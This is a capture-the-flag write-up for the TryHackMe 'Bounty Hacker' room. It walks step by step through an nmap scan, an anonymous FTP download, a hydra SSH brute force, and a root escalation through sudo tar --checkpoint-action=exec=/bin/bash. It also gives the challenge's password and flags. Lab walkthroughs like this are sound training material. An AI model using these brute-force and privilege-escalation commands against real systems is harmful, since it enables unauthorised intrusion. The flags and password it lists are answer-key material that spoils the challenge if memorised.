Challenges: Bounty Hacker (TryHackMe)

You were boasting in a bar about your elite hacking skills, and a few Bounty Hunters decided to take you up on your claims. Now, it's time to prove your worth. Your mission: break into a target system, collect user and root flags, and walk away with your reputation intact (and maybe some bell peppers & beef for the road). Let’s get started.

Living up to the title.

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!

Answer the questions below

1. Deploy the machine.

2. Find open ports on the machine

   nmap -sV <IP_Address>

   

   

3. Who wrote the task list? lin

   ftp <IP_Address>

   Name: anonymous

   ftp> ls

   ftp> get task.txt

   FTP> get locks.txt

   

   

4. What service can you bruteforce with the text file found? SSH

   

5. What is the users password? RedDr4gonSynd1cat3

   cat locks.txt
hydra -l lin -P locks.txt -t 4 ssh

   

6. user.txt THM{CR1M3_SyNd1C4T3}

   ssh lin@<IP_Address>

   password:
   cat user.txt

   

   

7. root.txt THM{80UN7Y_h4cK3r}

   sudo -l

   sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

find / -type f -name root.txt 2> /dev/null

cat /root/root.txt

You walked into the bar with confidence and left with proof: you are the real deal. With sharp recon, skilled brute-forcing, and clever privilege escalation, you conquered the BountyHacker challenge. No more boasting necessary—your flags speak for themselves. Enjoy your bell peppers and beef, hacker. 🍽️💻